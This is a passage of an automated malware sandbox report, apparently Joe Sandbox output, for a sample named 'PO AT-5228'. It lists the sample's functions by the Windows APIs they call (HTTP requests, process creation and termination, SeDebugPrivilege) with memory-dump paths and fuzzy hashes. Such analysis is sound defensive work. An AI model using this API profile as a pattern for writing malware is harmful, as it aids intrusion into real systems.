                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 00BDD16D
                                                                                        • ReleaseDC.USER32(?,00000000), ref: 00BDD175
                                                                                        • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00BDD200
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                                        • String ID: U
                                                                                        • API String ID: 4009187628-3372436214
                                                                                        • Opcode ID: b9e6c70c3dfb47a87b753d37ddeb590c5e0bfce72a382f9ea6c377bf42afad56
                                                                                        • Instruction ID: 5e52efd52228f610f747bd1ad5862f1eb983a8446f0e7985ce68117fbd48f74a
                                                                                        • Opcode Fuzzy Hash: b9e6c70c3dfb47a87b753d37ddeb590c5e0bfce72a382f9ea6c377bf42afad56
                                                                                        • Instruction Fuzzy Hash: 9171A130400209DFCF219F64CC81AAABBF5FF59354F1482AEFDA96A2A5E7318841DB50
                                                                                        APIs
                                                                                        • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00BB45FF
                                                                                        • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00BB462B
                                                                                        • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 00BB466D
                                                                                        • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00BB4682
                                                                                        • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00BB468F
                                                                                        • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 00BB46BF
                                                                                        • InternetCloseHandle.WININET(00000000), ref: 00BB4706
                                                                                          • Part of subcall function 00BB5052: GetLastError.KERNEL32(?,?,00BB43CC,00000000,00000000,00000001), ref: 00BB5067
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorHandleInfoLastOpenSend
                                                                                        • String ID:
                                                                                        • API String ID: 1241431887-3916222277
                                                                                        • Opcode ID: 47ce52f9da8e90463d486d3e8492487e5d7875ab07e54a9825b23716f00a6620
                                                                                        • Instruction ID: 96f9dceabd56fb59b191079dae11f666050e684a5607a315e583942d4da97dc6
                                                                                        • Opcode Fuzzy Hash: 47ce52f9da8e90463d486d3e8492487e5d7875ab07e54a9825b23716f00a6620
                                                                                        • Instruction Fuzzy Hash: 1E414BB1501619BFEB129F54CC89FFA77ECFB09354F004196FA069A152DBF09D448BA4
                                                                                        APIs
                                                                                        • GetModuleFileNameW.KERNEL32(?,?,00000104,?,00BFDC00), ref: 00BBB715
                                                                                        • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,00BFDC00), ref: 00BBB749
                                                                                        • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00BBB8C1
                                                                                        • SysFreeString.OLEAUT32(?), ref: 00BBB8EB
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                                                        • String ID:
                                                                                        • API String ID: 560350794-0
                                                                                        • Opcode ID: a0933e997b50f3294a94f1c7c2569093376dde245ec391049003da10aaa8525e
                                                                                        • Instruction ID: df0e7e441143529af787d00e66dc52526e84daddad735b46c9e2afac1b15f4d7
                                                                                        • Opcode Fuzzy Hash: a0933e997b50f3294a94f1c7c2569093376dde245ec391049003da10aaa8525e
                                                                                        • Instruction Fuzzy Hash: 3EF10775A00209AFCB14DF94C888EFEB7B9FF49315F108499F945AB250DBB1AE45CB90
                                                                                        APIs
                                                                                        • _memset.LIBCMT ref: 00BC24F5
                                                                                        • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00BC2688
                                                                                        • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00BC26AC
                                                                                        • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00BC26EC
                                                                                        • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00BC270E
                                                                                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00BC286F
                                                                                        • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 00BC28A1
                                                                                        • CloseHandle.KERNEL32(?), ref: 00BC28D0
                                                                                        • CloseHandle.KERNEL32(?), ref: 00BC2947
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                                                        • String ID:
                                                                                        • API String ID: 4090791747-0
                                                                                        • Opcode ID: 2c1e64939b01d7594a280bd95cba14f7ae0677c565cb62e63a91e79bc72b4bde
                                                                                        • Instruction ID: b9bb50e601734a72a47281c8118ae45c613c333539d84cf9194c45e12121a9f3
                                                                                        • Opcode Fuzzy Hash: 2c1e64939b01d7594a280bd95cba14f7ae0677c565cb62e63a91e79bc72b4bde
                                                                                        • Instruction Fuzzy Hash: 82D18B35604201DFCB14EF24C891F6ABBE5EF85310F1488ADF8999B2A2DB31EC45CB52
                                                                                        APIs
                                                                                        • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00BCB3F4
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: InvalidateRect
                                                                                        • String ID:
                                                                                        • API String ID: 634782764-0
                                                                                        • Opcode ID: 2f430ce8e8b86e1f90c1e7ca80aef2598389c5d7328fb307e0ebfb72a8e10aa6
                                                                                        • Instruction ID: d74418dad0edfdb77848066ef1cbdb60bdf87dd8619288439b98d3750b6e473b
                                                                                        • Opcode Fuzzy Hash: 2f430ce8e8b86e1f90c1e7ca80aef2598389c5d7328fb307e0ebfb72a8e10aa6
                                                                                        • Instruction Fuzzy Hash: DC519E30600254BFEF249F28CCD6FAD3BE4EB45314F24419AFA25E62E2DB71E9448B55
                                                                                        APIs
                                                                                        • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 00BDDB1B
                                                                                        • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00BDDB3C
                                                                                        • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00BDDB51
                                                                                        • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 00BDDB6E
                                                                                        • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00BDDB95
                                                                                        • DestroyIcon.USER32(00000000,?,?,?,?,?,?,00B7A67C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 00BDDBA0
                                                                                        • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00BDDBBD
                                                                                        • DestroyIcon.USER32(00000000,?,?,?,?,?,?,00B7A67C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 00BDDBC8
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                                                        • String ID:
                                                                                        • API String ID: 1268354404-0
                                                                                        • Opcode ID: 778fb9cb24e7b9ed05f7194b695239988c1cc3462412654409114b7389d984cb
                                                                                        • Instruction ID: 9c7c14d8381435d000bbde879c476354dffe71c28493020ea243f0a1ccf8b5fc
                                                                                        • Opcode Fuzzy Hash: 778fb9cb24e7b9ed05f7194b695239988c1cc3462412654409114b7389d984cb
                                                                                        • Instruction Fuzzy Hash: 6B515A70600209EFDB24DF64CC81FAE77F4EB58754F104559F95A9B690EBB0AD80DB50
                                                                                        APIs
                                                                                          • Part of subcall function 00BA6EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00BA5FA6,?), ref: 00BA6ED8
                                                                                          • Part of subcall function 00BA6EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00BA5FA6,?), ref: 00BA6EF1
                                                                                          • Part of subcall function 00BA72CB: GetFileAttributesW.KERNEL32(?,00BA6019), ref: 00BA72CC
                                                                                        • lstrcmpiW.KERNEL32(?,?), ref: 00BA75CA
                                                                                        • _wcscmp.LIBCMT ref: 00BA75E2
                                                                                        • MoveFileW.KERNEL32(?,?), ref: 00BA75FB
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                                                        • String ID:
                                                                                        • API String ID: 793581249-0
                                                                                        • Opcode ID: eedbd0f3e0cab0039825629e65aa4b64232b7d4c3ed850f3e0c859fc5831a509
                                                                                        • Instruction ID: c382c91ef2c88e6df8ea8aa7ad1795dde7b57253a329b4a264168bcd101e43c5
                                                                                        • Opcode Fuzzy Hash: eedbd0f3e0cab0039825629e65aa4b64232b7d4c3ed850f3e0c859fc5831a509
                                                                                        • Instruction Fuzzy Hash: 14511CB2A4D2199ADF50EB94DC819DE73FCEF09310B1044EAFA05A3151EA7496C9CF60
                                                                                        APIs
                                                                                        • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,00BDDAD1,00000004,00000000,00000000), ref: 00B7EAEB
                                                                                        • ShowWindow.USER32(00000000,00000000,00000000,00000000,00000000,?,00BDDAD1,00000004,00000000,00000000), ref: 00B7EB32
                                                                                        • ShowWindow.USER32(00000000,00000006,00000000,00000000,00000000,?,00BDDAD1,00000004,00000000,00000000), ref: 00BDDC86
                                                                                        • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,00BDDAD1,00000004,00000000,00000000), ref: 00BDDCF2
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: ShowWindow
                                                                                        • String ID:
                                                                                        • API String ID: 1268545403-0
                                                                                        • Opcode ID: 255577b93d0a2b533e9f8735114af0681846b8e19cd98fd2d3c24a4dfb2f1e34
                                                                                        • Instruction ID: 8e686c18366bb7480da78cefc2552b2358c29b5f16daa7e97c6b134c4fb3a0b4
                                                                                        • Opcode Fuzzy Hash: 255577b93d0a2b533e9f8735114af0681846b8e19cd98fd2d3c24a4dfb2f1e34
                                                                                        • Instruction Fuzzy Hash: F741E7702146809AD73547288DCDB2ABED5EF59304F1D88CEF0BF86B61D6B1F880C611
                                                                                        APIs
                                                                                        • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,00B9AEF1,00000B00,?,?), ref: 00B9B26C
                                                                                        • HeapAlloc.KERNEL32(00000000,?,00B9AEF1,00000B00,?,?), ref: 00B9B273
                                                                                        • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00B9AEF1,00000B00,?,?), ref: 00B9B288
                                                                                        • GetCurrentProcess.KERNEL32(?,00000000,?,00B9AEF1,00000B00,?,?), ref: 00B9B290
                                                                                        • DuplicateHandle.KERNEL32(00000000,?,00B9AEF1,00000B00,?,?), ref: 00B9B293
                                                                                        • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00B9AEF1,00000B00,?,?), ref: 00B9B2A3
                                                                                        • GetCurrentProcess.KERNEL32(00B9AEF1,00000000,?,00B9AEF1,00000B00,?,?), ref: 00B9B2AB
                                                                                        • DuplicateHandle.KERNEL32(00000000,?,00B9AEF1,00000B00,?,?), ref: 00B9B2AE
                                                                                        • CreateThread.KERNEL32(00000000,00000000,00B9B2D4,00000000,00000000,00000000), ref: 00B9B2C8
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                        • String ID:
                                                                                        • API String ID: 1957940570-0
                                                                                        • Opcode ID: bcb7fcc7540ba4053e71b3e646eb279211f2f79a2734d6b185f3f6ceb16551b9
                                                                                        • Instruction ID: e223da09781a18ea3904e7932b6a8aa426c268cfeca2bbc4a175a2c0c09b0ecc
                                                                                        • Opcode Fuzzy Hash: bcb7fcc7540ba4053e71b3e646eb279211f2f79a2734d6b185f3f6ceb16551b9
                                                                                        • Instruction Fuzzy Hash: 9B01BBB5240344BFE710ABA5DD89F6B7BACEB88711F018411FA15DF1A1CAB59800CB65
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: NULL Pointer assignment$Not an Object type
                                                                                        • API String ID: 0-572801152
                                                                                        • Opcode ID: 9985104ebbe876544f4b57378f3f9b6a726edf4047d4a3420d74cc335412d5f6
                                                                                        • Instruction ID: b3e71f9d61477a6aefe21c7ac99c1fd5cc19ccbff9bc3ca798818acb5a33aa18
                                                                                        • Opcode Fuzzy Hash: 9985104ebbe876544f4b57378f3f9b6a726edf4047d4a3420d74cc335412d5f6
                                                                                        • Instruction Fuzzy Hash: C5E19071A00219AFDF14DFA8D885AFE7BF5EF58314F1480A9F915AB281D7B0AD41CB90
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: Variant$ClearInit$_memset
                                                                                        • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                        • API String ID: 2862541840-625585964
                                                                                        • Opcode ID: 8e8a400fc151a583f7295896a40e0ebbda5c9ad4be4bc03374710f8afc84f5da
                                                                                        • Instruction ID: 9761e5cd01af3c1ffb6e9a4e272615de6936721d789915b6069c1f4f837265e2
                                                                                        • Opcode Fuzzy Hash: 8e8a400fc151a583f7295896a40e0ebbda5c9ad4be4bc03374710f8afc84f5da
                                                                                        • Instruction Fuzzy Hash: 44919171A00215ABDF24CF95C884FEEBBF8EF45710F1085A9F515AB290DBF49945CB90
                                                                                        APIs
                                                                                        • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00BC9B19
                                                                                        • SendMessageW.USER32(?,00001036,00000000,?), ref: 00BC9B2D
                                                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00BC9B47
                                                                                        • _wcscat.LIBCMT ref: 00BC9BA2
                                                                                        • SendMessageW.USER32(?,00001057,00000000,?), ref: 00BC9BB9
                                                                                        • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00BC9BE7
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$Window_wcscat
                                                                                        • String ID: SysListView32
                                                                                        • API String ID: 307300125-78025650
                                                                                        • Opcode ID: eb217a6c975df474a9c4be90f0dc0ae848676d11604f6f079308e95d80548dc7
                                                                                        • Instruction ID: 782c34f17722b34972d95cb37ede5d870111b6eee818baf1f546256f7a2ec3d3
                                                                                        • Opcode Fuzzy Hash: eb217a6c975df474a9c4be90f0dc0ae848676d11604f6f079308e95d80548dc7
                                                                                        • Instruction Fuzzy Hash: 12419071900348AFEB219FA4DC89FEE77E8EF08350F1045AAF549A7291D6B19D84CB60
                                                                                        APIs
                                                                                          • Part of subcall function 00BA6532: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00BA6554
                                                                                          • Part of subcall function 00BA6532: Process32FirstW.KERNEL32(00000000,0000022C), ref: 00BA6564
                                                                                          • Part of subcall function 00BA6532: CloseHandle.KERNEL32(00000000,?,00000000), ref: 00BA65F9
                                                                                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00BC179A
                                                                                        • GetLastError.KERNEL32 ref: 00BC17AD
                                                                                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00BC17D9
                                                                                        • TerminateProcess.KERNEL32(00000000,00000000), ref: 00BC1855
                                                                                        • GetLastError.KERNEL32(00000000), ref: 00BC1860
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00BC1895
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                                        • String ID: SeDebugPrivilege
                                                                                        • API String ID: 2533919879-2896544425
                                                                                        • Opcode ID: f8f76b8ee193a9c326da488de74c1f1868759620309b067362972140a94e0d16
                                                                                        • Instruction ID: 915eb8df5b6379247e076585c1699962d6fa6136454e933b00b47381e1f2b4ea
                                                                                        • Opcode Fuzzy Hash: f8f76b8ee193a9c326da488de74c1f1868759620309b067362972140a94e0d16
                                                                                        • Instruction Fuzzy Hash: 04419B71604200AFDB05EF68C8E5F6DB7E5EF55700F04849DF906AF282DBB9A9048B95
                                                                                        APIs
                                                                                        • LoadIconW.USER32(00000000,00007F03), ref: 00BA58B8
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: IconLoad
                                                                                        • String ID: blank$info$question$stop$warning
                                                                                        • API String ID: 2457776203-404129466
                                                                                        • Opcode ID: c4fe4278d8faac102446db455aaff6f59a09624a44f3807444c31dfd3ef27ffe
                                                                                        • Instruction ID: 0e270f6251987577040b44d3d14adcf82e742928ecc36ebe68c798bbb7ce190f
                                                                                        • Opcode Fuzzy Hash: c4fe4278d8faac102446db455aaff6f59a09624a44f3807444c31dfd3ef27ffe
                                                                                        • Instruction Fuzzy Hash: C911EE7230D742BAE7216B549C82DAE23DCEF17354B2000BAF640A6281E7A89B405264
                                                                                        APIs
                                                                                        • SafeArrayGetVartype.OLEAUT32(?,00000000), ref: 00BAA806
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
